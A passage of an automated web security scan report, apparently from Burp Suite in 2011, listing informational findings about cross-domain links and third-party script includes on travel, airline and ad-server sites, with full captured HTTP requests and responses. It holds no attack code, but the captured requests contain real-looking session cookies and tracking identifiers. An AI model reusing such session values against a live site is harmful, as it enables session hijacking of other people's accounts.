...[SNIP]...
</script>    
<script type="text/javascript" src="http://media.away.com/trip/tripjs/combined_javascript1-min.js"></script>
<script type="text/javascript" src="http://media.away.com/trip/tripjs/mbox.js"></script>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<noscript>
<a href="http://www.revresda.com/click.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=728x90%26keyword=%26CookieName=awyprd%26language=en_US">
<img src="http://www.revresda.com/image.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=728x90%26keyword=%26CookieName=awyprd%26language=en_US"/>
</a>
...[SNIP]...
<a href="/"><img src="http://media.away.com/trip/images/logos/trip-99x72-suitcase.png" alt="Trip.com logo" width="99" height="72"></a>
...[SNIP]...
<a href="http://blog.trip.com/2011/08/insider-tips-for-a-goa-trip.html"><img src="http://media.away.com/trip/images/blogs/6a0120a64b3ff4970b014e8aac1e5c970d-120wi.jpg" alt="" width="120" height="80"></a>
...[SNIP]...
<a href="http://blog.trip.com/2011/08/qa-with-a-bangalore-expert-jodi-dell-leblanc-taj-hotels-resorts-and-palaces.html"><img src="http://media.away.com/trip/images/blogs/6a0120a64b3ff4970b014e8a67a7e6970d-120wi.jpg" alt="" width="120" height="90"></a>
...[SNIP]...
<a href="http://blog.trip.com/2011/07/riviera-maya-with-kids.html"><img src="http://media.away.com/trip/images/blogs/6a0120a64b3ff4970b015433fcded7970c-120wi.jpg" alt="" width="120" height="64"></a>
...[SNIP]...
<li>Book <a target="_blank" href="http://www.orbitz.com/">hotels</a>
...[SNIP]...
<li>Find <a target="_blank" href="http://www.cheaptickets.com/">cheap flights</a>
...[SNIP]...
<li>Book <a target="_blank" href="http://www.hotelclub.com/">Cheap Hotels</a>
...[SNIP]...
<li><a target="_blank" href="http://www.ratestogo.com/">Last Minute Hotel Deals</a>
...[SNIP]...
<li>Research <a target="_blank" href="http://www.gorp.com/">national parks</a>
...[SNIP]...
<li>Get <a target="_blank" href="http://www.lodging.com/">lodging deals</a>
...[SNIP]...
<li>Book <a target="_blank" href="http://www.ebookers.com/">cheap hotels</a>
...[SNIP]...
<li><a href="http://careers.orbitz.com/" rel="nofollow">Careers</a>
...[SNIP]...
<li><a href="http://corp.orbitz.com/advertise/away" rel="nofollow">Advertise With Us</a>
...[SNIP]...
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-ceOUGeqFtBlUY.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
...[SNIP]...
<div class="TAN-footerlogo"><img src="http://media.away.com/away/images/comscore/away-96x39-808080.gif" alt="Away.com logo" width="96" height="39" id="TAN-awaylogo"></div>
       <div class="TAN-footerlogo "><img src="http://media.away.com/away/images/comscore/gorp-56x40-808080.gif" alt="Gorp.com logo" width="56" height="40" id="TAN-gorplogo"></div>
       <div class="TAN-footerlogo TAN-roundright"><img src="http://media.away.com/away/images/comscore/af-152x27-808080.gif" alt="GorpTravel.com logo" width="152" height="27" id="TAN-gtlogo"></div>
...[SNIP]...
<div><img src="http://media.away.com/away/images/comscore/trip-56x42-B82F25.gif" alt="Trip.com logo" width="56" height="42" id="TAN-triplogo"></div></div>
       <div class="TAN-footerlogo TAN-roundleft"><img src="http://media.away.com/away/images/comscore/lodging-129x31-808080.gif" alt="Lodging.com logo" width="129" height="31" id="TAN-lodginglogo"></div>
       <div class="TAN-footerlogo"><img src="http://media.away.com/away/images/comscore/away-footer-filler.gif" alt="The Away Network" width="95" height="35" id="TAN-oollogo"></div>
       <div class="TAN-label"><img src="http://media.away.com/away/images/comscore/the-away-network.gif" alt="The Away Network" width="135" height="39"></div>
...[SNIP]...
<div class="esc-image"><img src="http://media.away.com/trip/images/esclamation.gif" /></div>
...[SNIP]...
<!-- end move to compare rates js, replace swapWidgetFormCompareRates -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/dcl/provider_data_map-min.js"></script>
...[SNIP]...
</script> -->
   <script language="JavaScript" src="http://media.away.com/trip/tripjs/s_code.js"></script>
   <!-- End SiteCatalyst Code -->
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-jquery-min.js"></script>
   <script type="text/javascript" src="http://media.away.com/trip/tripjs/jquery/autofill-helper-min.js"></script>
...[SNIP]...
19.245. http://www.trip.com/box_ad_refresh.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trip.com
Path:   /box_ad_refresh.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /box_ad_refresh.html?type= HTTP/1.1
Host: www.trip.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_xxx.bxbz.dpn.80_dt_efgbvmu=ffffffff09e3442f45525d5f4f58455e445a4a423660; NSC_xxx.bxbz.dpn.80_gxe=ffffffff09e3882b45525d5f4f58455e445a4a423660; __utma=245868737.2049523975.1317602099.1317602099.1317602099.1; __utmb=245868737.2.10.1317602099; __utmc=245868737; __utmz=245868737.1317602099.1.1.utmcsr=orbitz|utmccn=triplooking|utmcmd=crpopunder|utmcct=air; mbox=check#true#1317602160|session#1317602099178-690078#1317603960|PC#1317602099178-690078.19#1318811702; __qca=P0-1307346892-1317602104437; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3D1%3B%20s_sq%3Dobtzawytrip.comprod%253D%252526pid%25253DFlights%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257Bjavascript%2525253AshowRndTripProviders%25252528%25252527flights%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:35:10 GMT
Server: Apache/2.2.18 (Unix) DAV/2 mod_jk/1.2.23
Last-Modified: Fri, 23 Sep 2011 00:04:36 GMT
ETag: "c42-4ad908dfe6d00"
Accept-Ranges: bytes
Cteonnt-Length: 3138
Content-Type: text/html
Cache-Control: private
Content-Length: 3138

<HTML>
<HEAD>
<script language="JavaScript" src="http://media.away.com/trip/tripjs/dcl/comparerates-min.js" type="text/javascript"></script>
<style>
h6.adlabel {text-align:center;color:#7E7E7E;fon
...[SNIP]...
<noscript>
   <a href="http://www.revresda.com/click.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=336x280%26keyword=%26CookieName=awyprd%26language=en_US">
<img src="http://www.revresda.com/image.ng/site=away%26subdomain=trip%26channel=air%26activity=%26focus=%26Section=main%26area=%26country=%26state=%26dest=%26adsize=336x280%26keyword=%26CookieName=awyprd%26language=en_US"/>
</a>
...[SNIP]...
19.246. http://www.tripadvisor.com/CheckMore  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tripadvisor.com
Path:   /CheckMore

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /CheckMore?detail=258705&storedUserData=inMonth%3D10%25202011%26inDay%3D14%26outMonth%3D10%25202011%26outDay%3D16%26adults%3DNaN%26pid%3D4799&vendorsChecked=BookingCom__HotelsCom2__Expedia__VenereHotelsLOWUS&vendorsOpened=BookingCom__HotelsCom2__Expedia&a=QC_Inline&s=SmartDeals&av=true&avLocId=258705 HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; TACds=C.2.11007.0.2011-10-02

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:04 GMT
Server: Apache
pragma: no-cache
cache-control: no-cache,no-store,must-revalidate
expires: 0
Set-Cookie: TATravelInfo=V2*AY.2011*AM.10*AD.14*DY.2011*DM.10*DD.16*A.2*MG.-1*HP.2*FL.3; Domain=.tripadvisor.com; Expires=Thu, 30-Sep-2021 01:02:04 GMT; Path=/
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.6*MC.11893*LS.CheckMore_SmartDeals*PD-2147.1*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.94*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.6*TRA.true*LL.4139280*LD.258705*EWS.CheckMore; Domain=.tripadvisor.com; Path=/
Set-Cookie: ServerPool=T; Domain=.tripadvisor.com; Path=/
Set-Cookie: PassThruUrlArgs=null; Domain=.tripadvisor.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 16671
Connection: close
Content-Type: text/html;charset=UTF-8

<div id="CHECK_MORE_SITES_LB" class="checking_rates">
<dl class="property zoom_wrap">
<dt class="heading">
You're checking rates on: </dt>
<dd class="details zoom_wrap">
<img class="thumbnail" src="ht
...[SNIP]...
dia', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount checkedStyle sprite-genericBGBtnVisited custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/Expedia.com-v2.gif" height="33" alt="Expedia.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
Com', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount checkedStyle sprite-genericBGBtnVisited custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/B.com_logo.gif" height="33" alt="Booking.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
om2', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount checkedStyle sprite-genericBGBtnVisited custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/Hotels.com-v1.gif" height="33" alt="Hotels.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
otelsLOWUS', 'defaultStyle sprite-genericBGBtn', 'checkedStyle sprite-genericBGBtnVisited', true)" class="unClickedCount defaultStyle sprite-genericBGBtn custom_area_QC_Inline custom_refer_SmartDeals"><img class="logoElem" src="http://c1.tacdn.com/img2/branding/hotels/Venere.gif" height="33" alt="Venere.com"/> <span class="showIndicator grn_chevronRgt sprite-grn_chevronRgt"><img class="x" src="http://c1.tacdn.com/img2/x.gif" alt=""/></span>
<img class="loading hideIndicator" src="http://c1.tacdn.com/img2/checkrates/loading.gif"/>
</a>
...[SNIP]...
<div class="crOverlayButton cmAvCrBtn" onmouseover=" ta.call('ta.overlays.Factory.relRightRemoteHLB', event, this)">
<img class="sprite-checkRates_ylw94x20 id_321151 cid_191 custom_area_QC_AlsoViewed_CheckMore cmAVTest" src="http://c1.tacdn.com/img2/x.gif" alt="" onclick="ta.commerce.checkrates.checkRatesCheckMore(event, this, '321151', 'alsoViewed')"/>
<script type="text/javascript">
...[SNIP]...
<div class="crOverlayButton cmAvCrBtn" onmouseover=" ta.call('ta.overlays.Factory.relRightRemoteHLB', event, this)">
<img class="sprite-checkRates_ylw94x20 id_94337 cid_191 custom_area_QC_AlsoViewed_CheckMore cmAVTest cmAVTest" src="http://c1.tacdn.com/img2/x.gif" alt="" onclick="ta.commerce.checkrates.checkRatesCheckMore(event, this, '94337', 'alsoViewed')"/>
<script type="text/javascript">
...[SNIP]...
<div class="crOverlayButton cmAvCrBtn" onmouseover=" ta.call('ta.overlays.Factory.relRightRemoteHLB', event, this)">
<img class="sprite-checkRates_ylw94x20 id_89575 cid_191 custom_area_QC_AlsoViewed_CheckMore cmAVTest cmAVTest cmAVTest" src="http://c1.tacdn.com/img2/x.gif" alt="" onclick="ta.commerce.checkrates.checkRatesCheckMore(event, this, '89575', 'alsoViewed')"/>
<script type="text/javascript">
...[SNIP]...
19.247. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-CA/quick_search_part.aspx?p=checkin HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3203


<form id="step-2" action="https://www4.thy.com/onlinecheckin/checkpax.tk?lang=en" method="post" class="validate" rel="test">
<div class="title">Check-in</div>
<div class="quick_search-online">

...[SNIP]...
<input id="eticketname" name="eticketname" tabindex=3 class="small fv-group" value="" maxlength="13" />
<a class="fancybox iframe" href="http://www4.thy.com/images/onlinecheckin/en/pnr.htm" style="float: left; height:25px; display:block;"><span class="ui-icons ui-icons-help float_left">
...[SNIP]...
<input id="pnr" name="pnr" tabindex=4 class="small fv-group" value="" maxlength="6" />
<a class="fancybox iframe" href="http://www4.thy.com/images/onlinecheckin/en/pnr.htm" style="float: left; height:25px; display:block;"><span class="ui-icons ui-icons-help float_left">
...[SNIP]...
<p>
<a class="fancybox iframe underlined" href="http://www4.thy.com/onlinecheckin/stations.tk?lang=en">to learn airports list online flight card service is available</a><br/>
<a class="fancybox iframe underlined" href="http://www4.thy.com/onlinecheckin/obpstations.tk?lang=en"></a>
...[SNIP]...
19.248. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-CA/quick_search_part.aspx?p=award HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1739

<form id="odulBiletLogin" name="tklogin" action="http://www4.thy.com/troyaonline/mainPageAwardStart.tk?lang=en" method="post">
<input type="hidden" value="TK" name="tk">
...[SNIP]...
<div class="float-left">If you have forgotten your PIN <a href="https://www4.thy.com/tkmiles/pinproblems.tk?lang=en" class="float_left red">click here</a>
...[SNIP]...
<div style="margin-top:10px;">
To Become a member click <a href="https://www4.thy.com/tkmiles/newmember.tk?lang=en">here</a>
...[SNIP]...
19.249. http://www.turkishairlines.com/en-CA/quick_search_part.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.turkishairlines.com
Path:   /en-CA/quick_search_part.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-CA/quick_search_part.aspx?p=reservation HTTP/1.1
Host: www.turkishairlines.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.turkishairlines.com/en-CA/index.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ksso3m55td3pq4almj0x3k45; __utma=1.1413828058.1317599904.1317599904.1317599904.1; __utmb=1.2.10.1317599904; __utmc=1; __utmz=1.1317599904.1.1.utmcsr=manutd.com|utmccn=(referral)|utmcmd=referral|utmcct=/Search-Results.aspx

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1771

<div class="">
<div class="title">Manage My Reservations</div>
</div>
<div class="clearfix"></div>
<div class="box-blue radius-4px" style="margin-top: 18px;">
<ul
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/reservations.tk?target=checkCancelConditions.tk&amp;lang=en">Cancellation</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/reservations.tk?target=checkRR.tk&amp;lang=en">Reconfirmation</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/troyaonline/reissueStart.tk?lang=EN">Rebooking/Reissue</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/troyaonline/retickStart.tk?lang=en">Pay&amp;Fly</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/reservations.tk?target=view&amp;lang=en">View</a>
...[SNIP]...
</span>
<a href="http://www4.thy.com/mybookings/etinput.tk?lang=en">Your E-Ticket</a>
...[SNIP]...
20. Cross-domain script include  previous  next
There are 120 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

20.1. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
<!-- Code auto-generated on Thu Sep 01 05:06:56 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
20.2. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
